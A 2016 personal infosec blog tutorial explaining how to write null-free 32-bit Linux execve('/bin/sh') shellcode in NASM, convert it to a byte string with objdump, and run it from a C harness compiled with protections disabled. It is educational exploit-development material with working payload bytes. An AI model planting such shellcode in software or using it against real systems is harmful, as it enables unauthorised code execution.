<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <title>
        Crafting Shellcode - General Infosec Ramblings
      </title>
    <head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport"
    content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  
  <meta name="theme-color" content="#000000" />
  
  <meta http-equiv="window-target" content="_top" />
  
  
  <meta name="description" content="Intro Right! Let me start off by saying that this is not going to be and assembly code primer. This is just intended to a brief intro into the mindset needed to craft shellcode. There are blogs and resources more comprehensive than this post that explain things in greater detail, one such book is the Shellcoders Handbook.
This is just going to be a whrilwind tour, at the end of which you&amp;rsquo;ll have a highlevel view of the thought process that goes into crafting shellcode." />
  <meta name="generator" content="Hugo 0.59.1 with theme pure" />
  <title>Crafting Shellcode - General Infosec Ramblings</title>
  

  <link rel="stylesheet" href="https://mwest67.github.io/css/style.css">
  <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/9.15.10/styles/github.min.css">
  <meta property="og:title" content="Crafting Shellcode" />
<meta property="og:description" content="Intro Right! Let me start off by saying that this is not going to be and assembly code primer. This is just intended to a brief intro into the mindset needed to craft shellcode. There are blogs and resources more comprehensive than this post that explain things in greater detail, one such book is the Shellcoders Handbook.
This is just going to be a whrilwind tour, at the end of which you&rsquo;ll have a highlevel view of the thought process that goes into crafting shellcode." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://mwest67.github.io/2016/11/crafting-shellcode/" />
<meta property="article:published_time" content="2016-11-02T00:00:00+00:00" />
<meta property="article:modified_time" content="2016-11-02T00:00:00+00:00" />
<meta itemprop="name" content="Crafting Shellcode">
<meta itemprop="description" content="Intro Right! Let me start off by saying that this is not going to be and assembly code primer. This is just intended to a brief intro into the mindset needed to craft shellcode. There are blogs and resources more comprehensive than this post that explain things in greater detail, one such book is the Shellcoders Handbook.
This is just going to be a whrilwind tour, at the end of which you&rsquo;ll have a highlevel view of the thought process that goes into crafting shellcode.">


<meta itemprop="datePublished" content="2016-11-02T00:00:00&#43;00:00" />
<meta itemprop="dateModified" content="2016-11-02T00:00:00&#43;00:00" />
<meta itemprop="wordCount" content="1758">



<meta itemprop="keywords" content="linux,shellcode,assembly,32bit," />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Crafting Shellcode"/>
<meta name="twitter:description" content="Intro Right! Let me start off by saying that this is not going to be and assembly code primer. This is just intended to a brief intro into the mindset needed to craft shellcode. There are blogs and resources more comprehensive than this post that explain things in greater detail, one such book is the Shellcoders Handbook.
This is just going to be a whrilwind tour, at the end of which you&rsquo;ll have a highlevel view of the thought process that goes into crafting shellcode."/>

  <!--[if lte IE 9]>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
    <![endif]-->

  <!--[if lt IE 9]>
      <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
      <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
    <![endif]-->

</head>
  </head>
  <body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage"><header class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="slimContent">
      <div class="navbar-header">
        <div class="profile-block text-center">
          <a id="avatar" href="https://github.com/mwest67" target="_blank">
            <img class="img-circle img-rotate" src="https://mwest67.github.io/avatar.png" width="200" height="200">
          </a>
          <h2 id="name" class="hidden-xs hidden-sm">mwest67</h2>
          <h3 id="title" class="hidden-xs hidden-sm hidden-md">Mike West</h3>
          <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i>Cyberspace</small>
        </div><div class="search" id="search-form-wrap">
    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i
                        class="icon icon-search"></i></button>
            </span>
        </div>
        <div class="ins-search">
            <div class="ins-search-mask"></div>
            <div class="ins-search-container">
                <div class="ins-input-wrapper">
                    <input type="text" class="ins-search-input" placeholder="Type something..."
                        x-webkit-speech />
                    <button type="button" class="close ins-close ins-selectable" data-dismiss="modal"
                        aria-label="Close"><span aria-hidden="true">×</span></button>
                </div>
                <div class="ins-section-wrapper">
                    <div class="ins-section-container"></div>
                </div>
            </div>
        </div>
    </form>
</div>
        <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
          <span class="sr-only">Toggle navigation</span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
      </div>
      <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
        <ul class="nav navbar-nav main-nav">
            <li class="menu-item menu-item-home">
                <a href="/">
                    <i class="icon icon-home-fill"></i>
                  <span class="menu-title">Home</span>
                </a>
            </li>
            <li class="menu-item menu-item-archives">
                <a href="/posts">
                    <i class="icon icon-archives-fill"></i>
                  <span class="menu-title">Archives</span>
                </a>
            </li>
            <li class="menu-item menu-item-categories">
                <a href="/categories">
                    <i class="icon icon-folder"></i>
                  <span class="menu-title">Categories</span>
                </a>
            </li>
            <li class="menu-item menu-item-tags">
                <a href="/tags">
                    <i class="icon icon-tags"></i>
                  <span class="menu-title">Tags</span>
                </a>
            </li>
            <li class="menu-item menu-item-about">
                <a href="/about">
                    <i class="icon icon-cup-fill"></i>
                  <span class="menu-title">About</span>
                </a>
            </li>
        </ul>
      </nav>
    </div>
  </header>
  <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">Board</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content"><p>enjoy~</p>
            </div>
        </div>
    </div>
</div>

      <div class="widget">
    <h3 class="widget-title"> Categories</h3>
    <div class="widget-body">
        <ul class="category-list">
        </ul>
    </div>
</div>
      <div class="widget">
    <h3 class="widget-title"> Tags</h3>
    <div class="widget-body">
        <ul class="tag-list">
            
            
            <li class="tag-list-item"><a href="https://mwest67.github.io/tags/32bit/" class="tag-list-link">32bit</a><span
                    class="tag-list-count">4</span></li>
            
            
            <li class="tag-list-item"><a href="https://mwest67.github.io/tags/assembly/" class="tag-list-link">assembly</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://mwest67.github.io/tags/bufferoverflow/" class="tag-list-link">bufferoverflow</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://mwest67.github.io/tags/exploit/" class="tag-list-link">exploit</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://mwest67.github.io/tags/linux/" class="tag-list-link">linux</a><span
                    class="tag-list-count">4</span></li>
            
            
            <li class="tag-list-item"><a href="https://mwest67.github.io/tags/shellcode/" class="tag-list-link">shellcode</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://mwest67.github.io/tags/slae/" class="tag-list-link">slae</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://mwest67.github.io/tags/tools/" class="tag-list-link">tools</a><span
                    class="tag-list-count">1</span></li>
            
        </ul>

    </div>
</div>
      
<div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
        <ul class="recent-post-list list-unstyled no-thumbnail">
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://mwest67.github.io/2017/03/slae-tcp-bind-shell/" class="title">SLAE Tcp Bind Shell</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2017-03-21 00:00:00 &#43;0000 UTC" itemprop="datePublished">2017-03-21</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://mwest67.github.io/2016/11/buffer-overflow-level-1/" class="title">Buffer overflows (Level 1)</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2016-11-03 00:00:00 &#43;0000 UTC" itemprop="datePublished">2016-11-03</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://mwest67.github.io/2016/11/crafting-shellcode/" class="title">Crafting Shellcode</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2016-11-02 00:00:00 &#43;0000 UTC" itemprop="datePublished">2016-11-02</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://mwest67.github.io/2016/11/format-strings/" class="title">Format Strings</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2016-11-01 00:00:00 &#43;0000 UTC" itemprop="datePublished">2016-11-01</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://mwest67.github.io/2016/10/using-vagrant/" class="title">Using Vagrant</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2016-10-31 00:00:00 &#43;0000 UTC" itemprop="datePublished">2016-10-31</time>
                    </p>
                </div>
            </li>
        </ul>
    </div>
</div>
  </div>
</aside>

    
    
  <aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
    <div class="slimContent">
      <nav id="toc" class="article-toc">
        <h3 class="toc-title">Catalogue</h3>
        <div class="toc-content always-active"><nav id="TableOfContents">
<ul>
<li><a href="#intro">Intro</a></li>
<li><a href="#syscalls">Syscalls</a></li>
<li><a href="#information-gathering">Information Gathering</a></li>
<li><a href="#limitations">Limitations</a></li>
<li><a href="#on-to-the-source">On to the source</a></li>
<li><a href="#converting-to-shellcode">Converting to shellcode</a></li>
<li><a href="#test-the-shellcode">Test the shellcode</a></li>
</ul>
</nav>
        </div>
      </nav>
    </div>
  </aside>
<main class="main" role="main"><div class="content">
  <article id="-" class="article article-type-" itemscope
    itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      <h1 itemprop="name">
  <a
    class="article-title"
    href="/2016/11/crafting-shellcode/"
    >Crafting Shellcode</a
  >
</h1>

      <div class="article-meta">
        <span class="article-date">
  <i class="icon icon-calendar-check"></i>
<a href="https://mwest67.github.io/2016/11/crafting-shellcode/" class="article-date">
  <time datetime="2016-11-02 00:00:00 &#43;0000 UTC" itemprop="datePublished">2016-11-02</time>
</a>
</span>  
  <span class="article-tag">
    <i class="icon icon-tags"></i>
    <a class="article-tag-link" href="/tags/linux/"> linux </a>
    <a class="article-tag-link" href="/tags/shellcode/"> shellcode </a>
    <a class="article-tag-link" href="/tags/assembly/"> assembly </a>
    <a class="article-tag-link" href="/tags/32bit/"> 32bit </a>
  </span>

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2016/11/crafting-shellcode/#comments"
            class="article-comment-link">Comments</a></span>
		<span class="post-wordcount hidden-xs" itemprop="wordCount">Word Count:1758words</span>
		<span class="post-readcount hidden-xs" itemprop="timeRequired">Read Count:9minutes </span>
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      

<h1 id="intro">Intro</h1>

<p>Right! Let me start off by saying that this is not going to be and assembly code
primer. This is just intended to a brief intro into the mindset needed to craft
shellcode. There are blogs and resources more comprehensive than this post that
explain things in greater detail, one such book is the <a href="https://www.amazon.co.uk/Shellcoders-Handbook-Discovering-Exploiting-Security/dp/047008023X">Shellcoders
Handbook</a>.</p>

<p>This is just going to be a whrilwind tour, at the end of which you&rsquo;ll have a
highlevel view of the thought process that goes into crafting shellcode.</p>

<h1 id="syscalls">Syscalls</h1>

<p>In linux (IA32) syscalls are generally called by placing the syscall number in
the EAX register and then putting parameters in EBX, ECX and EDX with the return
value being placed back in EAX. The kernel is then instructed to execute the
call bu triggering the 0x80 interupt</p>

<p>How do we find these syscall numbers? Well these are listed in the include file
unistd_32.h</p>

<p>On the vm I prepared (snag the vagrant file from the Vagrant post) they are in</p>

<pre><code>  $ cat /usr/include/i386-linux-gnu/asm/unistd_32.h | head -20
  #ifndef _ASM_X86_UNISTD_32_H
  #define _ASM_X86_UNISTD_32_H

  /*
   * This file contains the system call numbers.
   */

  #define __NR_restart_syscall      0
  #define __NR_exit		  1
  #define __NR_fork		  2
  #define __NR_read		  3
  #define __NR_write		  4
  #define __NR_open		  5
  #define __NR_close		  6
  #define __NR_waitpid		  7
  #define __NR_creat		  8
  #define __NR_link		  9
  #define __NR_unlink		 10
  #define __NR_execve		 11
  #define __NR_chdir		 12
</code></pre>

<p>We are going to write some shellcode which will call the execve syscall which is
number 11.</p>

<h1 id="information-gathering">Information Gathering</h1>

<p>We have our first piece of infomation, 11 is the number for the execve syscall.
The next piece of info we need is what parameters does execve expect. To find
this out we turn to the man pages.</p>

<pre><code>  $ man execve
  NAME
         execve - execute program

  SYNOPSIS
         #include &lt;unistd.h&gt;

         int execve(const char *filename, char *const argv[],
                    char *const envp[]);
</code></pre>

<p>As you can see it takes a string which is the file to execute (which is going to
be /bin/sh in our example) then it takes an argument array and then an array
containing the environment (which will be NULL for our purposes).</p>

<p>To recap our arguments are going to be
* /bin/sh
* [/bin/sh, 0x0]
* 0x0
You may be thinking why the arguments array contains a reference to /bin/sh
again? Well remember from your C days that argv[0] is the program name itself!.</p>

<p>So with that information in mind to think of this call in assembly below is how
we want the registers to end up right before we call the int 0x80 to trigger the
call
* EAX: 11 (execve syscall)
* EBX: Address of string /bin/sh
* ECX: Address of Array containing [/bin/sh, 0x0]
* EDX; Address pinting to a 0z0</p>

<h1 id="limitations">Limitations</h1>

<p>When generating shellcode we have a few restrictions.
1. We want the shellcode as small as possible, so we tend to reuse data already
   setup
2. We dont want any NULL bytes as they usually cause problems (as 0x0
   terminsates strings etc)</p>

<p>With that in mind lets continue</p>

<h1 id="on-to-the-source">On to the source</h1>

<p>First I would like to point out I&rsquo;m using NASM here which uses intel style
assembly.</p>

<p>First we&rsquo;ll get the string /bin/sh on the stack. Now it will take less
instructions to get 8 bytes onto the stack than 7 (the current length of
/bin/sh) so to get around this we&rsquo;ll put the string //bin/sh on the stack (try
this out linux doesnt care about the extra /)</p>

<p>We have to put the string on in reverse order so we start with the null
terminator</p>

<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-nasm" data-lang="nasm">  <span style="color:#a6e22e">xor</span> eax, eax  <span style="color:#75715e">; zero out eax</span>
  <span style="color:#a6e22e">push</span> eax      <span style="color:#75715e">; push the 0x0 on the stack</span></code></pre></div>

<p>we now have the null terminator on the stack so now lets get the rest of the
string. We&rsquo;ll use python to get the hex value for this</p>

<pre><code>  $ python -c 'print &quot;//bin/sh&quot;[::-1].encode(&quot;hex&quot;)'
  68732f6e69622f2f
</code></pre>

<p>So we split this in half and then push it onto the stack</p>

<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-nasm" data-lang="nasm">  <span style="color:#a6e22e">push</span> <span style="color:#ae81ff">0x68732f6e</span>   <span style="color:#75715e">; push the first half to the stack</span>
  <span style="color:#a6e22e">push</span> <span style="color:#ae81ff">0x69622f2f</span>   <span style="color:#75715e">; push the second half of the stack</span>
  <span style="color:#a6e22e">mov</span> ebx, esp      <span style="color:#75715e">; move the address of the stack pointer to ebx (1st</span>
                    <span style="color:#75715e">; parameter to execve</span></code></pre></div>

<p>Now we can do two things next
1. Push the 0x0 onto the stack that we can use for the 3rd parameter (address of
   which will go into EDX)
2. We can use the address stored in EBX (the address //bin/sh string) as the
   value of ECX</p>

<p>Point 2 easy to see if you visualize the stack</p>

<pre><code>Top                 Bottom of Stack
0x00000000 //bin/sh 0x00000000
EDX        EBX
</code></pre>

<p>So now if we point ECX to the address of the //bin/sh string we have our array</p>

<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-nasm" data-lang="nasm">  <span style="color:#a6e22e">push</span> eax      <span style="color:#75715e">; push 0x0 on the stack</span>
  <span style="color:#a6e22e">mov</span>  edx, esp <span style="color:#75715e">; move the address of 0x0 to the 3rd param</span>
  <span style="color:#a6e22e">push</span> ebx      <span style="color:#75715e">; push the address of //bin/sh on the stack</span>
  <span style="color:#a6e22e">mov</span>  ecx, esp <span style="color:#75715e">; move the address of the address of //bin/sh into ecx</span>
                <span style="color:#75715e">; which is our secong parameter</span></code></pre></div>

<p>All that is left to do is to make the call</p>

<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-nasm" data-lang="nasm">  <span style="color:#a6e22e">mov</span> al, <span style="color:#ae81ff">11</span>  <span style="color:#75715e">; move 11 into EAX (execve call is number 11)</span>
  <span style="color:#a6e22e">int</span> <span style="color:#ae81ff">0x80</span>    <span style="color:#75715e">; trigger the call</span></code></pre></div>

<p>Above you will notice I use the al register which the the 8bit version of the
EAX register, this is so there are no NULL bytes in the assembly as 32 bit
version of 11 in hex is 0x0000000b and the 8 bit version is 0x0b.</p>

<p>With that all done here is the final assembly</p>

<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-nasm" data-lang="nasm"><span style="color:#66d9ef">global</span> _start
<span style="color:#66d9ef">section</span> .text
_start:
  <span style="color:#a6e22e">xor</span>  eax, eax	  <span style="color:#75715e">; zero out eax</span>
  <span style="color:#a6e22e">push</span> eax        <span style="color:#75715e">; push NULL onto stack to termins //bin/sh</span>
  <span style="color:#a6e22e">push</span> <span style="color:#ae81ff">0x68732f6e</span> <span style="color:#75715e">; push //bin/sh in reverse onto the stack</span>
                  <span style="color:#75715e">; (extra / is to make data multiple of 4)</span>
  <span style="color:#a6e22e">push</span> <span style="color:#ae81ff">0x69622f2f</span> <span style="color:#75715e">; see above</span>
  <span style="color:#a6e22e">mov</span>  ebx, esp   <span style="color:#75715e">; move address of //bin/sh into EBX (execve&#39;s 1st parameter)</span>
  <span style="color:#a6e22e">push</span> eax        <span style="color:#75715e">; this serves two purposes 1, to use for EDX (we will pass no</span>
                  <span style="color:#75715e">; environment to the shell and also as part of the array of</span>
                  <span style="color:#75715e">; args that we will pass to as the 2nd arg of execve</span>
  <span style="color:#a6e22e">mov</span>  edx, esp	  <span style="color:#75715e">; see above</span>
  <span style="color:#a6e22e">push</span> ebx        <span style="color:#75715e">; ESP now points to and array of args [address of //bin/sh, 0x00]</span>
                  <span style="color:#75715e">; these will act as the args to //bin/sh</span>
  <span style="color:#a6e22e">mov</span> ecx, esp	  <span style="color:#75715e">; setup the 3rd argument</span>
  <span style="color:#a6e22e">mov</span> al, <span style="color:#ae81ff">11</span>      <span style="color:#75715e">; set the EAX register to the execve sys call number</span>
                  <span style="color:#75715e">; using al to remove any null bytes</span>
  <span style="color:#a6e22e">int</span> <span style="color:#ae81ff">0x80</span>        <span style="color:#75715e">; make the call</span></code></pre></div>

<p>To recap the few tricks we used
1. Used xor to create a NULL without having a null in the code
2. Added the extra / to the /bin/sh string to make pushing the data easier and
   with less instructions
3. Reused data we already had on the stack to create the arguments array for the
   execve call
4. Used the 8 bit version (al) of the EAX register to avoid NULL bytes in the
   generated code</p>

<p>Save the above code to execve.nasm, compile, link and run</p>

<pre><code>  $ nasm -f elf32 -o execve.o execve.nasm
  $ ld -o execve execve.o
  $ ./execve
  $
</code></pre>

<p>If you are running bash you will notice now that your prompt has changed,
congrats your syscall worked!!</p>

<h1 id="converting-to-shellcode">Converting to shellcode</h1>

<p>So how do we go about converting this assembled object file into a shellcode
string you see in exploits? There is a little tool called objdump which happens
to have a -d flag and this flag dissasembles object files, lets see</p>

<pre><code>  $ objdump -d execve.o

  execve.o:     file format elf32-i386


  Disassembly of section .text:

  00000000 &lt;_start&gt;:
     0:	31 c0                	xor    %eax,%eax
     2:	50                   	push   %eax
     3:	68 6e 2f 73 68       	push   $0x68732f6e
     8:	68 2f 2f 62 69       	push   $0x69622f2f
     d:	89 e3                	mov    %esp,%ebx
     f:	50                   	push   %eax
    10:	89 e2                	mov    %esp,%edx
    12:	53                   	push   %ebx
    13:	89 e1                	mov    %esp,%ecx
    15:	b0 0b                	mov    $0xb,%al
    17:	cd 80                	int    $0x80
</code></pre>

<p>As you can see we from above we have our original assembly back (kind of). You
see those hex bytes that appear before our assembly instructions? Those are the
op codes that the CPU understands and those are what we need in our shellcode
string.</p>

<p>First we will need only the lines that contain instructions</p>

<pre><code>  $ objdump -d execve.o | grep &quot;^ &quot;
     0:	31 c0                	xor    %eax,%eax
     2:	50                   	push   %eax
     3:	68 6e 2f 73 68       	push   $0x68732f6e
     8:	68 2f 2f 62 69       	push   $0x69622f2f
     d:	89 e3                	mov    %esp,%ebx
     f:	50                   	push   %eax
    10:	89 e2                	mov    %esp,%edx
    12:	53                   	push   %ebx
    13:	89 e1                	mov    %esp,%ecx
    15:	b0 0b                	mov    $0xb,%al
    17:	cd 80                	int    $0x80
</code></pre>

<p>Next we want just the second column or field</p>

<pre><code>  $ objdump -d execve.o | grep &quot;^ &quot; | cut -f2
  31 c0
  50
  68 6e 2f 73 68
  68 2f 2f 62 69
  89 e3
  50
  89 e2
  53
  89 e1
  b0 0b
  cd 80
</code></pre>

<p>Then we want to iterate over each of these bytes and put the \x in front of
them. For loops to the rescue</p>

<pre><code>  $ for i in $(objdump -d execve.o | grep &quot;^ &quot; | cut -f2); do echo '\x'$i; done
  \x31
  \xc0
  \x50
  \x68
  \x6e
  \x2f
  \x73
  \x68
  \x68
  \x2f
  \x2f
  \x62
  \x69
  \x89
  \xe3
  \x50
  \x89
  \xe2
  \x53
  \x89
  \xe1
  \xb0
  \x0b
  \xcd
  \x80
</code></pre>

<p>Nearly! Fortunately echo has a -n flag that prevents it from printing newlines</p>

<pre><code>  $ for i in $(objdump -d execve.o | grep &quot;^ &quot; | cut -f2); do echo -n '\x'$i; done
\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80$
</code></pre>

<p>So close!!!! We can just put an extra echo at the end</p>

<pre><code>  $ for i in $(objdump -d execve.o | grep &quot;^ &quot; | cut -f2); do echo -n '\x'$i; done; echo
  \x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
  $
</code></pre>

<h1 id="test-the-shellcode">Test the shellcode</h1>

<p>Now to test the shellcode we need a program we can put this in to run it. Below
is a C program whic I did not create myself (Thanks Vivek from
<a href="http://www.securitytube.net">SecurityTube</a></p>

<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;string.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">char</span> code[] <span style="color:#f92672">=</span> \
<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f</span><span style="color:#e6db74">&#34;</span> \
<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89</span><span style="color:#e6db74">&#34;</span> \
<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\xe1\xb0\x0b\xcd\x80</span><span style="color:#e6db74">&#34;</span>;

main()
{

  printf(<span style="color:#e6db74">&#34;Shellcode Length:  %d</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, strlen(code));

        <span style="color:#66d9ef">int</span> (<span style="color:#f92672">*</span>ret)() <span style="color:#f92672">=</span> (<span style="color:#66d9ef">int</span>(<span style="color:#f92672">*</span>)())code;

        ret();

}</code></pre></div>

<p>This program just passes execution to our shellcode which we placed in the code
string. Compile it using</p>

<pre><code>  $ gcc -fno-stack-protector -z execstack -o shell_test shell_test.c
  $ ./shell_test 
  Shellcode Length:  25
  $  
</code></pre>

<p>as you can see the program printed the length of the shellcode and then passed
control of execution to our shellcode and we have now ended up with a shell!</p>

<p>Hope you enjoyed this. Check out <a href="http://www.securitytube.net">SecurityTube</a>
they have free videos on x86 linux and windows assembly if you are interested in
that sort of thing!</p>

    </div>
  </article>
<section id="comments">
</section>

</div><nav class="bar bar-footer clearfix" data-stick-bottom>
    <div class="bar-inner">
        <ul class="pager pull-left">
            <li class="prev">
                <a href="https://mwest67.github.io/2016/11/format-strings/" title="Format Strings"><i
                        class="icon icon-angle-left"
                        aria-hidden="true"></i><span>&nbsp;&nbsp;Newer</span></a>
            </li>
            <li class="next">
                <a href="https://mwest67.github.io/2016/11/buffer-overflow-level-1/"
                    title="Buffer overflows (Level 1)"><span>Older&nbsp;&nbsp;</span><i
                        class="icon icon-angle-right" aria-hidden="true"></i></a>
            </li>
            
            <li class="toggle-toc">
                <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false"
                    title="Catalogue" role="button">
                    <span>[&nbsp;</span><span>Catalogue</span>
                    <i class="text-collapsed icon icon-anchor"></i>
                    <i class="text-in icon icon-close"></i>
                    <span>]</span>
                </a>
            </li>
        </ul>
        <div class="bar-right">
        </div>
    </div>
</nav>
</main><footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
<ul class="social-links">
    <li><a href="https://github.com/mwest67" target="_blank" title="github" data-toggle=tooltip data-placement=top >
            <i class="icon icon-github"></i></a></li>
    <li><a href="https://mwest67.github.io/index.xml" target="_blank" title="rss" data-toggle=tooltip data-placement=top >
            <i class="icon icon-rss"></i></a></li>
</ul>
  <div class="copyright">
    &copy;2016  -
    2019
    <div class="publishby">
        Theme by <a href="https://github.com/xiaoheiAh" target="_blank"> xiaoheiAh </a>base on<a href="https://github.com/xiaoheiAh/hugo-theme-pure" target="_blank"> pure</a>.
    </div>
  </div>
</footer>
<script src="https://cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
   window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/highlight.min.js"></script>

<script>
hljs.configure({
  tabReplace: '    ', 
  classPrefix: ''     
                      
})
hljs.initHighlightingOnLoad();
</script>
<script type="text/javascript" src="https://mwest67.github.io/js/application.js"></script>
<script type="text/javascript" src="https://mwest67.github.io/js/plugin.js"></script>
<script>
      (function (window) {
          var INSIGHT_CONFIG = {
              TRANSLATION: {
                  POSTS: 'Posts',
                  PAGES: 'Pages',
                  CATEGORIES: 'Categories',
                  TAGS: 'Tags',
                  UNTITLED: '(Untitled)',
              },
              ROOT_URL: 'https:\/\/mwest67.github.io\/',
              CONTENT_URL: 'https:\/\/mwest67.github.io\/\/searchindex.json ',
          };
          window.INSIGHT_CONFIG = INSIGHT_CONFIG;
      })(window);
      </script>
<script type="text/javascript" src="https://mwest67.github.io/js/insight.js"></script>


  </body>
</html>
